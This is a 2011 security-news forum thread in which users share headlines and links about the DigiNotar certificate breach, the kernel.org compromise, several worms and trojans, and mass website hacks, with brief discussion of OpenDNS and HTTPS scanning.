Taiwan opposition says computers hacked by Chinese
Taiwan's main opposition party said Tuesday its headquarters has been the target of a sustained hacking attack from China and one instance of hacking from the government in Taipei.
http://www.rdmag.com/News/FeedsAP/2011/08/information-tech-taiwan-opposition-says-computers-hacked-by-chinese/
***
-
***
SSL VPNs pose network security risks
The use of secure sockets layer (SSL) virtual private networks (VPNs) opens up networks to security risks, according to a white paper by NCP Engineering.
The NCP white paper – Debunking the Myths of SSL VPN Security - warns that vulnerabilities are endemic is SSL to the point where banks have their customer data stolen at “an alarming rate" and "web application developers create a false sense of security by trusting the confidence and credibility of a protocol that is likely to fail them before they can get through a single development cycle.”
http://news.hitb.org/content/ssl-vpns-pose-network-security-risks
***
-
***
Fraudster used Facebook to hack bank accounts
A hacker stole £35,000 from his neighbours' online bank accounts after working out the answers to their security questions from information they posted on Facebook and Friends Reunited.
Iain Wood spent up to 18 hours per day online, working out passwords from personal information posted on social networking sites by his acquiantances.
http://www.independent.ie/world-news/europe/fraudster-used-facebook-to-hack-bank-accounts-2848416.html
***
-
Facebook goes down on November 5........... :'( Oh, what i am going to do now ???
http://www.youtube.com/watch?v=LsbNabK5FDE (http://www.youtube.com/watch?v=LsbNabK5FDE)
http://www.youtube.com/watch?v=aPGYznzgK6M&feature=related (http://www.youtube.com/watch?v=aPGYznzgK6M&feature=related)
That guy used a tanslator......... ???
-
Facebook goes down on November 5........... :'( Oh, what i am going to do now ???
http://www.forbes.com/sites/parmyolson/2011/08/11/why-the-anonymous-facebook-plot-was-a-dud/
-
German Federal Office for Information Security warns of hacked online shops
http://www.h-online.com/security/news/item/German-Federal-Office-for-Information-Security-warns-of-hacked-online-shops-1323427.html
-
Expert says Adobe omits mention of 400 Flash Player flaws
http://www.h-online.com/security/news/item/Expert-says-Adobe-omits-mention-of-400-Flash-Player-flaws-1321881.html
How Did You Get to that Number?
http://blogs.adobe.com/asset/2011/08/how-did-you-get-to-that-number.html
-
German Federal Office for Information Security warns of hacked online shops
http://www.h-online.com/security/news/item/German-Federal-Office-for-Information-Security-warns-of-hacked-online-shops-1323427.html
Rapid relief for osCommerce administrators
http://www.h-online.com/security/features/Rapid-relief-for-osCommerce-administrators-1324235.html
-
Google Admits Handing over European User Data to US Intelligence Agencies
August 8th, 2011, 15:43 GMT| By Lucian Constantin
Google admits sharing EU data with US government
Enlarge picture
Google has admitted complying with requests from US intelligence agencies for data stored in its European data centers, most likely in violation of European Union data protection laws.
Gordon Frazer, Microsoft UK's managing director, made news headlines some weeks ago when he admitted that Microsoft can be compelled to share data with the US government regardless of where it is hosted in the world.
http://news.softpedia.com/news/Google-Admits-Handing-over-European-User-Data-to-US-Intelligence-Agencies-215740.shtml
-
Mozilla has now publised version 6 of Firefox.
This version fixes eight vulnerabilities, which Mozilla has set to critical, as well as two high.
http://www.mozilla.org/security/announce/2011/mfsa2011-29.html
-
New malware attack via Facebook
A tricky approach can cause immense damage
The past days brought a new wave of malware attacks via Facebook to German speaking users. Many users received a message via Facebook’s chat functionality that looked something like this:
http://blog.gdatasoftware.com/blog/article/new-malware-attack-via-facebook.html
-
***
Most PCs Contain 12 Vulnerabilities
Despite improvements in secure operating systems and security software, most users’ PCs contain on average around 12 different vulnerabilities, according to a Kaspersky Lab Q2 threat study.
Adobe (NSDQ:ADBE) flaws comprised the vast majority of the 10 most common vulnerabilities, followed by Oracle (NSDQ:ORCL)-Sun-Java glitches. Seven of the top 10 vulnerabilities were found in Adobe Flash Player.
http://www.crn.com/news/security/231500321/kaspersky-report-most-pcs-contain-12-vulnerabilities.htm?cid=nl_sec
***
-
[OT] @Charly: Do you/we really need this huge posts to inform us..?? ;)
-
***
Hackers Unlock, Start Subaru Outback With Cell Phone
Solnik and Bailey have not made public the name of the specific software programs and platforms that they targeted with their text-message attack. The Black Hat demonstration was intended to show automakers that should they not take proper security precautions when developing their automotive software, then it is entirely possible that individuals with less than honorable intentions will gain access to more important systems and cause greater damage. For example, the potential for chaos is amplified should hackers sit in the street after hours in front of a dealership and remotely disable vehicle software on a large scale.
http://www.autobytel.com/subaru/news/hackers-unlock-start-subaru-outback-with-cell-phone-102620/
And if this is possible, it is also possible for hackers to turn-off your automobile while you are driving.
***
-
***
Beladen Loads Hacked Web Sites With Badness
At least 40,000 Web sites recently were hacked and retrofitted with instructions that silently attempt to infest visitor PCs with malicious software, security experts warn.
Each hacked site redirects to Web sites that bombard the visitor's PC with about 20 different Web browser vulnerabilities and browser plug-in attacks, targeting older, insecure versions of several third-party applications like QuickTime and Winzip.
This latest mass Web site hack is thought to be separate from a similar recent incident referred to as "Gumblar," so named because an estimated 60,000 domains hijacked over several weeks redirected visitors to a malware-serving Web site named Gumblar.cn, among others.
If you were to visit one of these sites hacked with the Beladen code, you probably wouldn't notice anything amiss. In the background, though, malicious code inserted into the site would force your browser to invisibly contact google-analyt1cs.net (please don't visit this site either), which checks the name of the referring Web site, records the date and time stamp of the visit, and then forwards the victim on to the Beladen site, which then silently attempts to exploit a series of browser vulnerabilities.
http://voices.washingtonpost.com/securityfix/2009/06/beladen_loads_hacked_web_sites.html
***
-
Mac OS X Lion fails to check passwords when authenticating via LDAP
http://www.h-online.com/security/news/item/Mac-OS-X-Lion-fails-to-check-passwords-when-authenticating-via-LDAP-1328704.html
-
UPnP-enabled routers allow attacks on LANs
http://www.h-online.com/security/news/item/UPnP-enabled-routers-allow-attacks-on-LANs-1329727.html
-
Yale oversight exposes 43,000 Social Security numbers
http://news.cnet.com/8301-27080_3-20096355-245/yale-oversight-exposes-43000-social-security-numbers/
http://www.yaledailynews.com/news/2011/aug/17/yale-affiliates-ssns-were-searchable-google/
-
Apache HTTPD Security ADVISORY
http://article.gmane.org/gmane.comp.apache.announce/58
-
Windows Remote Desktop worm "Morto" spreading
http://www.f-secure.com/weblog/archives/00002227.html
http://isc.sans.edu/diary/Increased%2BTraffic%2Bon%2BPort%2B3389/11452
http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Worm%3AWin32%2FMorto.A
-
Hacker steals user data from Nokia developer forum
http://www.h-online.com/security/news/item/Hacker-steals-user-data-from-Nokia-developer-forum-1332867.html
-
Fraudulent certificate triggers blocking from software companies
https://www.eff.org/deeplinks/2011/08/iranian-man-middle-attack-against-google
http://www.microsoft.com/technet/security/advisory/2607712.mspx
http://blog.mozilla.com/security/2011/08/29/fraudulent-google-com-certificate/
http://support.mozilla.com/en-US/kb/deleting-diginotar-ca-cert
http://googleonlinesecurity.blogspot.com/2011/08/update-on-attempted-man-in-middle.html
-
Fraudulent certificate triggers blocking from software companies
https://www.eff.org/deeplinks/2011/08/iranian-man-middle-attack-against-google
http://www.microsoft.com/technet/security/advisory/2607712.mspx
http://blog.mozilla.com/security/2011/08/29/fraudulent-google-com-certificate/
http://support.mozilla.com/en-US/kb/deleting-diginotar-ca-cert
http://googleonlinesecurity.blogspot.com/2011/08/update-on-attempted-man-in-middle.html
"Google Chrome users were protected from this attack because Chrome was able to detect the fraudulent certificate. "
-
Fraudulent certificate triggers blocking from software companies
https://www.eff.org/deeplinks/2011/08/iranian-man-middle-attack-against-google
http://www.microsoft.com/technet/security/advisory/2607712.mspx
http://blog.mozilla.com/security/2011/08/29/fraudulent-google-com-certificate/
http://support.mozilla.com/en-US/kb/deleting-diginotar-ca-cert
http://googleonlinesecurity.blogspot.com/2011/08/update-on-attempted-man-in-middle.html
Thanks Asyn.
For Firefox users, take an action! It's not just about reading!
-
1. Thanks Asyn.
2. For Firefox users, take an action! It's not just about reading!
1. NP Tech.
2. Fully agree..! (I already did so.)
-
Fraudulent certificate triggers blocking from software companies
https://www.eff.org/deeplinks/2011/08/iranian-man-middle-attack-against-google
http://www.microsoft.com/technet/security/advisory/2607712.mspx
http://blog.mozilla.com/security/2011/08/29/fraudulent-google-com-certificate/
http://support.mozilla.com/en-US/kb/deleting-diginotar-ca-cert
http://googleonlinesecurity.blogspot.com/2011/08/update-on-attempted-man-in-middle.html
Fake Google certificate is the result of a hack
http://www.h-online.com/open/news/item/Fake-Google-certificate-is-the-result-of-a-hack-1333728.html
http://www.vasco.com/company/press_room/news_archive/2011/news_diginotar_reports_security_incident.aspx
-
***
Fake Anti-Virus, Social Network Scams On The Rise
... researchers found that the rising tide of fake anti-virus during the first half of 2011 includes a new variant consisting of fake desktop utilities, propelled by SpyEye and Zeus Trojan spam.
... the report found that security threats from social media continue to rise as social networking sites such as Facebook and Twitter are increasingly used in the workplace.
... rogue apps that impersonate online games in order to distribute malware.
... mobile security threats for the Android platform experienced a big upward spike, proliferated with the growth of the Android Market.
http://www.crn.com/news/security/231600446/fake-anti-virus-social-network-scams-on-the-rise-report.htm;jsessionid=Im5cs88mTXd-5XWl+mtdZQ**.ecappj02?cid=nl_sec
***
-
***
Apple Gives Internship To JailbreakMe Creator
Sometimes, if you can’t beat them, employ them. Nicholas Allegra, a 19-year-old hacker and creator of the Jailbreakme.com site, responsible for a series of jaibreaking iOS hacks, has officially been hired as an intern at Apple
http://www.crn.com/news/security/231600297/apple-gives-internship-to-jailbreakme-creator-comex.htm?cid=nl_sec
***
-
***
Xpaj Botnet Intercepts 87 Million Web Searches In Click-Fraud Scheme
... researchers said Friday they recently uncovered the file-infector W32.Xpaj.B botnet, also known simply as Xpaj, by digging up command and control servers containing encrypted binary data, encryption keys, databases and Web applications used in conjunction with a widespread click-fraud scheme over the last several months.
http://www.crn.com/news/security/231600289/xpaj-botnet-intercepts-87-million-web-searches-in-click-fraud-scheme.htm?cid=nl_sec
***
-
***
Skype Cross-Site Scripting Flaw Enables Phone Session Attacks
A gaping cross-site scripting flaw in the latest version of Skype enables attackers to inject malicious code into a user’s phone sessions.
The cross-site scripting vulnerability occurs in Skype 5.5.1.113, affecting Windows XP, Vista and 7, and stems from a persistent code injection vulnerability due to a validation input error that prevents the VoIP client from properly inspecting phone numbers sourced from users’ home, office and mobile Skype accounts, according to researcher Levent Kayan.
http://www.crn.com/news/security/231600218/skype-cross-site-scripting-flaw-enables-phone-session-attacks.htm?cid=nl_sec
***
-
Fraudulent certificate triggers blocking from software companies
https://www.eff.org/deeplinks/2011/08/iranian-man-middle-attack-against-google
http://www.microsoft.com/technet/security/advisory/2607712.mspx
http://blog.mozilla.com/security/2011/08/29/fraudulent-google-com-certificate/
http://support.mozilla.com/en-US/kb/deleting-diginotar-ca-cert
http://googleonlinesecurity.blogspot.com/2011/08/update-on-attempted-man-in-middle.html
Fake Google certificate is the result of a hack
http://www.h-online.com/open/news/item/Fake-Google-certificate-is-the-result-of-a-hack-1333728.html
http://www.vasco.com/company/press_room/news_archive/2011/news_diginotar_reports_security_incident.aspx
More Info
http://www.h-online.com/security/news/item/Updated-Chrome-and-Firefox-for-fraudulent-Google-certificate-available-1333898.html
http://my.opera.com/securitygroup/blog/2011/08/30/when-certificate-authorities-are-hacked-2
http://www.f-secure.com/weblog/archives/00002228.html
http://nakedsecurity.sophos.com/2011/08/31/google-blacklists-247-certificates-is-it-related-to-diginotar-hacking-incident
-
Et al,
Just thought I'd post this for other users and viewers to peruse at their leisure.
See: http://news.cnet.com/8301-27080_3-20099421-245/google-users-in-iran-targeted-in-ssl-spoof/?tag=contentMain;contentBody
re: Spoofed and Invalid CA certificates.
I come here every week or so to see what is out there as far as malware trends are going. Looks like the latest and greatest (sadly) is the one currently known as 'Enhanced Protection Virus'. I wish Essexboy all the best in finding a successful resolution for the two users whom currently have this rogue program on their machines.
If we have known spoofed CA's, then is this not a part of the problem with Google Re-direct, since we don't really know for sure where the browser is ending up at? ??? ???
Note, too, the link provided for the program called 'Covergence', at the bottom of the blog, which is said to analyze for certificate revocations, that does not work on my machine. When the add-on is run in FF 6.0, it says it is not compatible.
As always, I run my browser in a sandbox to test before installing anything like this. Could this affect proper operation? Why would it say 'incompatible' if it is supposed to run on FF?
Just a question, if anyone cares to explain possible reasons.
I sure some have seen this blog, but just want to make sure everyone here at this forum knows about it.
mchain
XP Home Edition SP 3 P4 2 GB RAM Avast! Free Edition v. 6.0.1203
-
Security breach on kernel.org
http://kernel.org/#news
http://linux-foundation.org/weblogs/lwf/2011/08/31/the-cracking-of-kernelorg/
http://git-blame.blogspot.com/2011/08/how-to-inject-malicious-commit-to-git.html
-
Fraudulent certificate triggers blocking from software companies
https://www.eff.org/deeplinks/2011/08/iranian-man-middle-attack-against-google
http://www.microsoft.com/technet/security/advisory/2607712.mspx
http://blog.mozilla.com/security/2011/08/29/fraudulent-google-com-certificate/
http://support.mozilla.com/en-US/kb/deleting-diginotar-ca-cert
http://googleonlinesecurity.blogspot.com/2011/08/update-on-attempted-man-in-middle.html
Fake Google certificate is the result of a hack
http://www.h-online.com/open/news/item/Fake-Google-certificate-is-the-result-of-a-hack-1333728.html
http://www.vasco.com/company/press_room/news_archive/2011/news_diginotar_reports_security_incident.aspx
More Info
http://www.h-online.com/security/news/item/Updated-Chrome-and-Firefox-for-fraudulent-Google-certificate-available-1333898.html
http://my.opera.com/securitygroup/blog/2011/08/30/when-certificate-authorities-are-hacked-2
http://www.f-secure.com/weblog/archives/00002228.html
http://nakedsecurity.sophos.com/2011/08/31/google-blacklists-247-certificates-is-it-related-to-diginotar-hacking-incident
The DigiNotar Debacle, and what you should do about it
https://blog.torproject.org/blog/diginotar-debacle-and-what-you-should-do-about-it
-
@Asyn,
Clicking on the link in your last post brings up the following:
(http://my.jetscreenshot.com/2701/m_20110902-g9jm-49kb.jpg) (http://my.jetscreenshot.com/2701/20110902-g9jm-49kb)
Strange, the only thing I had blocked in openDNS was Adult content and randomized isp's.
I don't see any here and yet the site was blocked.
I've removed the filer.
-
@Asyn,
Clicking on the link in your last post brings up the following:
Sorry Bob, can't help you, I just tried it again and it still works here...!
Do you use OpenDNS..?? The alert seems related to it.
-
Yes I do and I guess according to them, it's not a safe place to go.
-
No problem with the link either, not using OpenDNS either.
Can't see why OpenDNS would object to this, however would also depend on what your dashboard settings are if you have any set.
-
Yes I do and I guess according to them, it's not a safe place to go.
Well, usually it's one of the safest places to go...!!! ;)
http://en.wikipedia.org/wiki/Tor_%28anonymity_network%29
https://www.torproject.org/index.html.en
-
Yes I do and I guess according to them, it's not a safe place to go.
Im using OpenDNS and that link is not blocked for me but im not using the dashboard settings, just the basic DNS addresses.
-
Yes I do and I guess according to them, it's not a safe place to go.
Its definitly not a safe place to go according to OpenDNS!
-
Yes I do and I guess according to them, it's not a safe place to go.
Its definitly not a safe place to go according to OpenDNS!
I just removed that filter and now the site shows.
Apparently the blog likes to hide its whereabouts.
-
***
Beladen Loads Hacked Web Sites With Badness
At least 40,000 Web sites recently were hacked and retrofitted with instructions that silently attempt to infest visitor PCs with malicious software, security experts warn.
Each hacked site redirects to Web sites that bombard the visitor's PC with about 20 different Web browser vulnerabilities and browser plug-in attacks, targeting older, insecure versions of several third-party applications like QuickTime and Winzip.
This latest mass Web site hack is thought to be separate from a similar recent incident referred to as "Gumblar," so named because an estimated 60,000 domains hijacked over several weeks redirected visitors to a malware-serving Web site named Gumblar.cn, among others.
If you were to visit one of these sites hacked with the Beladen code, you probably wouldn't notice anything amiss. In the background, though, malicious code inserted into the site would force your browser to invisibly contact google-analyt1cs.net (please don't visit this site either), which checks the name of the referring Web site, records the date and time stamp of the visit, and then forwards the victim on to the Beladen site, which then silently attempts to exploit a series of browser vulnerabilities.
http://voices.washingtonpost.com/securityfix/2009/06/beladen_loads_hacked_web_sites.html
***
CharlieO,
Just clicked the above link, and got a text page of some sort just before the intended site appeared and loaded as "Washington Post". Do not know what I saw, but when I saw it, I went, oh no!, as this behavior may describe exactly the problem you are referring to.
As I run my browser sandboxed, it does not appear to be affected.
Do you see the same behavior?
mchain
XP Home Edition SP3 P4 2.8 2GB RAM Avast! Free 6.0.1203
-
Fraudulent certificate triggers blocking from software companies
https://www.eff.org/deeplinks/2011/08/iranian-man-middle-attack-against-google
http://www.microsoft.com/technet/security/advisory/2607712.mspx
http://blog.mozilla.com/security/2011/08/29/fraudulent-google-com-certificate/
http://support.mozilla.com/en-US/kb/deleting-diginotar-ca-cert
http://googleonlinesecurity.blogspot.com/2011/08/update-on-attempted-man-in-middle.html
Fake Google certificate is the result of a hack
http://www.h-online.com/open/news/item/Fake-Google-certificate-is-the-result-of-a-hack-1333728.html
http://www.vasco.com/company/press_room/news_archive/2011/news_diginotar_reports_security_incident.aspx
More Info
http://www.h-online.com/security/news/item/Updated-Chrome-and-Firefox-for-fraudulent-Google-certificate-available-1333898.html
http://my.opera.com/securitygroup/blog/2011/08/30/when-certificate-authorities-are-hacked-2
http://www.f-secure.com/weblog/archives/00002228.html
http://nakedsecurity.sophos.com/2011/08/31/google-blacklists-247-certificates-is-it-related-to-diginotar-hacking-incident
The DigiNotar Debacle, and what you should do about it
https://blog.torproject.org/blog/diginotar-debacle-and-what-you-should-do-about-it
Slammed with a lifetime ban
http://www.theregister.co.uk/2011/09/03/diginotar_game_over/ (http://www.theregister.co.uk/2011/09/03/diginotar_game_over/)
-
more on the above
Secure browsing turns insecure (again)
http://www.norman.com/security_center/security_center_archive/2011/secure_browsing_turns_insecure_again/en
-
more on the above
Secure browsing turns insecure (again)
http://www.norman.com/security_center/security_center_archive/2011/secure_browsing_turns_insecure_again/en
Gargamel360 and Pondus,
Shoot, just when I mistakenly thought things might get better! It would seem that what is needed is for most, if not all, ip traffic to be https: once the issues are worked out with security certificates.
I know, I know, then the model of an open internet would be lost, but how does the average user today protect themselves from a corrupt and malicious nation-state, or even be aware that such a problem or situation exists?
The original model of the internet was for, among other things, military security and communications in the beginning, but as time has gone by, and as things have changed and progressed, I am beginning to think that this original model is sordidly archaic and obsolete, and that very ominous and dark clouds and storms are just forming beyond the horizon, unseen, unheard, and unfelt. These threats are becoming more real by the minute, and the need for those to preserve the world as a safe place for freedom is becoming more dire with each passing moment. The only way to know for sure that you are talking to who you think you are is now intrinsically intertwined with the validity of a security certificate. And, even then....
And the Iranian government is denying this right to it's own citizens? What, pray tell, is the value of a human life in Iran? Let me guess....
Knowledge is a wonderful power if used judiciously and with fairness towards all. Remember, it is for us, and for our children, and our children's children. They will inherit this world after us, and we should not let this darkness prevail or even descend upon, the lives of those innocent of this maliciousness, or for those that will follow.
I say, Not on our watch.
Not if I can help it.
mchain
-
Fraudulent certificate triggers blocking from software companies
https://www.eff.org/deeplinks/2011/08/iranian-man-middle-attack-against-google
http://www.microsoft.com/technet/security/advisory/2607712.mspx
http://blog.mozilla.com/security/2011/08/29/fraudulent-google-com-certificate/
http://support.mozilla.com/en-US/kb/deleting-diginotar-ca-cert
http://googleonlinesecurity.blogspot.com/2011/08/update-on-attempted-man-in-middle.html
Fake Google certificate is the result of a hack
http://www.h-online.com/open/news/item/Fake-Google-certificate-is-the-result-of-a-hack-1333728.html
http://www.vasco.com/company/press_room/news_archive/2011/news_diginotar_reports_security_incident.aspx
More Info
http://www.h-online.com/security/news/item/Updated-Chrome-and-Firefox-for-fraudulent-Google-certificate-available-1333898.html
http://my.opera.com/securitygroup/blog/2011/08/30/when-certificate-authorities-are-hacked-2
http://www.f-secure.com/weblog/archives/00002228.html
http://nakedsecurity.sophos.com/2011/08/31/google-blacklists-247-certificates-is-it-related-to-diginotar-hacking-incident
The DigiNotar Debacle, and what you should do about it
https://blog.torproject.org/blog/diginotar-debacle-and-what-you-should-do-about-it
Slammed with a lifetime ban
http://www.theregister.co.uk/2011/09/03/diginotar_game_over/ (http://www.theregister.co.uk/2011/09/03/diginotar_game_over/)
DigiNotar Damage Disclosure
https://blog.torproject.org/blog/diginotar-damage-disclosure
https://www.govcert.nl/english/service-provision/knowledge-and-publications/factsheets/factsheet-fraudulently-issued-security-certificate-discovered.html
-
<snip>
Shoot, just when I mistakenly thought things might get better! It would seem that what is needed is for most, if not all, ip traffic to be https: once the issues are worked out with security certificates.
<snip>
mchain
For me that would be the worst possible security choice, as the Web Shield doesn't monitor HTTPS traffic; so wouldn't provide the same level of protection that it is very good at on HTTP traffic. Blocking malware at source, sniffing out exploits and hacked sites, this happens to lots of sites and just because you are using an HTTPS connection doesn't stop that.
You only need to take a browse round the viruses and worms forum to see just how beneficial its protection is. Many people only find out their site has been hacked after avast users tell them or if they come to the forums to report what they consider a false positive only to find the detection is good.
Be careful what you wish for ;D
-
<snip>
Shoot, just when I mistakenly thought things might get better! It would seem that what is needed is for most, if not all, ip traffic to be https: once the issues are worked out with security certificates.
<snip>
mchain
For me that would be the worst possible security choice, as the Web Shield doesn't monitor HTTPS traffic; so wouldn't provide the same level of protection that it is very good at on HTTP traffic. Blocking malware at source, sniffing out exploits and hacked sites, this happens to lots of sites and just because you are using an HTTPS connection doesn't stop that.
You only need to take a browse round the viruses and worms forum to see just how beneficial its protection is. Many people only find out their site has been hacked after avast users tell them or if they come to the forums to report what they consider a false positive only to find the detection is good.
Be careful what you wish for ;D
DavidR,
There is much I do not know. This fact re WebShield was unknown to me. Perhaps, when seen in the light of what you say, then, it is best to leave things as they are; but we also need to maintain and keep our awareness of exploits designed to hurt and cripple those who mean no harm to others.
Among all the other activities we do, this one, use of the Internet, is in but a smaller realm, but has become essential to, and is in part of, our structure of our modern world. If we lose control of that, then our future may be not as easily foreseeable as it may be now.
Few may agree with my assessment; it is, however, meant in all sincerity.
Perhaps Avast! could monitor HTTPS traffic as well if need be. That, I think, was an implied point in what I was trying to say, although it was never specifically directed towards Avast!. I am sorry I did not make this clear; I was not aware of, and did not know of, some of the basic structures upon which the Internet is built upon. I did not know Avast! did not monitor HTTPS traffic, for example.
What I wish for is something better than we now have. I think the need is to find a way to prevent exploitative behavior in the first place. How to do this I cannot say.
If I wanted to learn how, and I do, I think here in this forum would be an excellent place to begin.
mchain
XP Home Edition SP3 2GB RAM Avast! 6.0.1203
-
The whole point of HTTPS (secure encrypted connection) is to keep prying eyes out, including your AV and this is no different from most other AVs, that is the ones that even have web content scanning.
The problem being the avast web shield redirects http traffic through its 'localhost' proxy; so it would have to handle the secure connection in a similar way to Mail Shield does to possibly do this. Right now that doesn't/can't happen, but it is I believe something they are working on for a future version of avast (no point in asking dates, etc. as this isn't firm right now).
-
@mchain: If you want to discuss this further please open a new topic.
Thanks,
asyn
-
***
Some of the below has already been posted but there are some new items to be aware of in the slide show presentation.
10 Biggest Cyber Attacks In August
Anonymous hackers kicked off the month of August with a cyber attack against FBI contractor ManTech International, which they claimed compromised almost 400 megabytes of data from the managed cybersecurity provider and was part of its AntiSec campaign -- a collaborative effort between Anonymous and spin-off hacker group LulzSec.
Included in the stolen data were numerous documents belonging to NATO, the U.S. Army, the U.S Department of Homeland Security, the U.S. State Department and the U.S. Department of Justice, as well as other personnel information, the group said.
http://www.crn.com/slide-shows/security/231600608/10-biggest-cyber-attacks-in-august.htm;jsessionid=usMK7Z0OR4pmmNi6OATDcw**.ecappj02?cid=nl_sec
***
-
***
British Police Arrest Two More Anonymous Hacker Suspects
British police arrested two men Thursday allegedly affiliated with the global hacker collective Anonymous and spinoff group LulzSec.
British police arrested 20-year-old Christopher Weatherhead, from Northampton, and Ashley Rhodes, 26, from London, charging both individuals with computer crimes.
Also as part of the same crackdown, two other suspects -- 22-year-old Peter Bigson, as well as a 17-year-old from Chester -- have already been arrested and charged with computer crimes, which allegedly included cyber attacks against PayPal, Amazon (NSDQ:AMZN), MasterCard , Bank of America and Visa.
http://www.crn.com/news/security/231600764/british-police-arrest-two-more-anonymous-hacker-suspects.htm?cid=nl_sec
***
-
Microsoft Security Advisory (2607712)
Fraudulent Digital Certificates Could Allow Spoofing
http://www.microsoft.com/technet/security/advisory/2607712.mspx
Update available now through Windows update.
* A restart is required for all editions of Windows XP and of Windows Server 2003.
* A restart is not required for all editions of Windows Vista, of Windows 7, of Windows Server 2008, and of Windows Server 2008 R2. The installer stops the required services, applies the update, and then restarts the services. However, if the required services cannot be stopped for any reason, or if required files are being used, this update will require a restart. If this behavior occurs, you receive a message that advises you to restart.
-
***
Man Gets 6-Year Jail Term For 'Sextortion'
A California man was sentenced to six years in prison for hacking into dozens of computers, stealing personal information and demanding naked images from female victims in exchange for not releasing the stolen information.
http://www.wbaltv.com/r/29057215/detail.html
***
-
Fraudulent certificate triggers blocking from software companies
https://www.eff.org/deeplinks/2011/08/iranian-man-middle-attack-against-google
http://www.microsoft.com/technet/security/advisory/2607712.mspx
http://blog.mozilla.com/security/2011/08/29/fraudulent-google-com-certificate/
http://support.mozilla.com/en-US/kb/deleting-diginotar-ca-cert
http://googleonlinesecurity.blogspot.com/2011/08/update-on-attempted-man-in-middle.html
Fake Google certificate is the result of a hack
http://www.h-online.com/open/news/item/Fake-Google-certificate-is-the-result-of-a-hack-1333728.html
http://www.vasco.com/company/press_room/news_archive/2011/news_diginotar_reports_security_incident.aspx
More Info
http://www.h-online.com/security/news/item/Updated-Chrome-and-Firefox-for-fraudulent-Google-certificate-available-1333898.html
http://my.opera.com/securitygroup/blog/2011/08/30/when-certificate-authorities-are-hacked-2
http://www.f-secure.com/weblog/archives/00002228.html
http://nakedsecurity.sophos.com/2011/08/31/google-blacklists-247-certificates-is-it-related-to-diginotar-hacking-incident
The DigiNotar Debacle, and what you should do about it
https://blog.torproject.org/blog/diginotar-debacle-and-what-you-should-do-about-it
Slammed with a lifetime ban
http://www.theregister.co.uk/2011/09/03/diginotar_game_over/ (http://www.theregister.co.uk/2011/09/03/diginotar_game_over/)
DigiNotar Damage Disclosure
https://blog.torproject.org/blog/diginotar-damage-disclosure
https://www.govcert.nl/english/service-provision/knowledge-and-publications/factsheets/factsheet-fraudulently-issued-security-certificate-discovered.html
DigiNotar breach due to disastrous security
http://www.h-online.com/security/news/item/DigiNotar-breach-due-to-disastrous-security-Update-1337573.html
http://www.rijksoverheid.nl/bestanden/documenten-en-publicaties/rapporten/2011/09/05/diginotar-public-report-version-1/rapport-fox-it-operation-black-tulip-v1-0.pdf
Browser makers update their DigiNotar disaster updates
http://www.h-online.com/security/news/item/Browser-makers-update-their-DigiNotar-disaster-updates-1338144.html
-
GlobalSign suspend issuing SSL certificates
http://www.h-online.com/security/news/item/GlobalSign-suspend-issuing-SSL-certificates-1338634.html
-
Win32/Delf.QCZ also known as "Avast enchanced protection mode"
Additional details http://www.eset.com/about/blog/blog/article/win32delf-qcz-additional-details/
Something interesting and new?
When someone logs in from the infected computer, the credentials are stored in the registry.
-
Mouse attack ;D
Netragard’s Hacker Interface Device (HID).
http://pentest.snosoft.com/2011/06/24/netragards-hacker-interface-device-hid/
We (Netragard) recently completed an engagement for a client with a rather restricted scope. The scope included a single IP address bound to a firewall that offered no services what so ever. It also excluded the use of social attack vectors based on social networks, telephone, or email and disallowed any physical access to the campus and surrounding areas. With all of these limitations in place, we were tasked with penetrating into the network from the perspective of a remote threat, and succeeded.
-
Sorry :-[ if this is a double post
Monthly Malware Statistics: August 2011
August in Figures
The following statistics were compiled in August using data collected from computers running Kaspersky Lab products:
193,989,043 networks attacks were blocked;
64,742,608 web-borne infections were prevented;
258,090,156 malicious programs were detected and neutralized on user computers;
80,155,498 heuristic verdicts were registered.
August is traditionally one of the busiest months for the information security industry, despite the summer holiday season. Two of the top security conferences take place in August in the US: BlackHat and Defcon. These two events are a popular platform for announcing the results of top studies and not only discuss the results of the past year, but address the issues looming on the horizon. New attack methods are discussed at the conferences, in addition to different hacking technologies — some of which, unfortunately, are subsequently applied in malicious programs. Furthermore, the summer holiday season creates additional problems for individual computer users and organizations alike. People on vacation use the Internet more frequently at Internet cafes, free WiFi hotspots, airports, etc., which means they are outside of their usual security perimeter and have higher chances of becoming the victims of malicious users.
Out-of-the-box activity
Let’s take a closer look at some of the new malicious programs and malicious technologies employed by “the other side” in August.
Ice IX: the bastard child of ZeuS
http://www.securelist.com/en/analysis/204792190/Monthly_Malware_Statistics_August_2011 (http://www.securelist.com/en/analysis/204792190/Monthly_Malware_Statistics_August_2011)
-
Security breach on kernel.org
http://kernel.org/#news
http://linux-foundation.org/weblogs/lwf/2011/08/31/the-cracking-of-kernelorg/
http://git-blame.blogspot.com/2011/08/how-to-inject-malicious-commit-to-git.html
Security breach at Linux Foundation
http://www.h-online.com/open/news/item/Security-breach-at-Linux-Foundation-1340733.html
-
GlobalSign suspend issuing SSL certificates
http://www.h-online.com/security/news/item/GlobalSign-suspend-issuing-SSL-certificates-1338634.html
Incident Response
http://www.globalsign.com/company/press/090611-security-response.html
-
Return of the BIOS trojans
http://www.h-online.com/security/news/item/Return-of-the-BIOS-trojans-1341421.html
-
more on BIOS malware
Malware burrows deep into computer BIOS to escape AV - Mebromi rootkit also targets master boot record
http://www.theregister.co.uk/2011/09/14/bios_rootkit_discovered/
-
Android banking trojan intercepts security texts - Thought you were so clever, Mr Banker Guy
http://www.theregister.co.uk/2011/09/14/spyeye_targets_android_phones/
-
***
Adobe 'Critical' Security Update Removes Fraudulent DigiNotar Certificates
Adobe (NSDQ:ADBE) joined Microsoft (NSDQ:MSFT) with its own “Patch Tuesday,” issuing a security update that repaired a slew of critical flaws in numerous versions of Reader and Acrobat products, including potential vulnerability to attacks resulting from fraudulent DigiNotar certificates.
Specifically, the Adobe security update repaired critical flaws in Adobe Reader 10.1 and earlier versions for Windows and Mac OS X, as well as Adobe Reader 9.4.2 and earlier versions for UNIX and Adobe Acrobat X and earlier versions for Windows and Mac OS X.
http://www.crn.com/news/security/231601428/adobe-critical-security-update-removes-fraudulent-diginotar-certificates.htm;jsessionid=PCjw2qxsScayBtDzSLwHzw**.ecappj01?cid=nl_sec
***
-
***
Microsoft Fixes Office, Excel Flaws In 'Non-Critical' Patch Tuesday Release
Microsoft (NSDQ:MSFT) issued a modest patch load for its September Patch Tuesday release, but coupled the security bulletin with yet another update blacklisting more fraudulent DigiNotar SSL certificates.
Microsoft’s Patch Tuesday bulletin mildly surprised the security community by containing just five updates, none of which were deemed with the highest severity ranking of "critical."
